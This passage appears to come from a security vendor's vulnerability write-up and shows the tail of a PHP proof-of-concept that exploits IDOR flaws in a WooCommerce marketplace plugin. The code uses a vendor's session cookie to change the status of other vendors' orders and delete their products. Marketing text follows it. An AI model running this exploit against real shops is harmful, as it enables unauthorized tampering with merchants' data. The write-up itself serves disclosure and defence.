    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIE, $vendor_cookie);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Adjust for testing.
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    echo "[+] Attempting to modify order ID: $target_order_idn";
    echo "    HTTP Code: $http_coden";
    echo "    Response: $responsenn";
}

// Function to demonstrate product deletion IDOR.
function poc_delete_product($target_product_id) {
    global $target_url, $vendor_cookie;
    
    $post_data = array(
        'action' => 'delete_wcfm_product',
        'productid' => $target_product_id
    );
    
    $ch = curl_init($target_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIE, $vendor_cookie);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    echo "[+] Attempting to delete product ID: $target_product_idn";
    echo "    HTTP Code: $http_coden";
    echo "    Response: $responsenn";
}

// Example usage with placeholder target IDs.
// poc_modify_order_status(123); // Replace 123 with a target order ID not owned by the vendor.
// poc_delete_product(456); // Replace 456 with a target product ID not owned by the vendor.

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School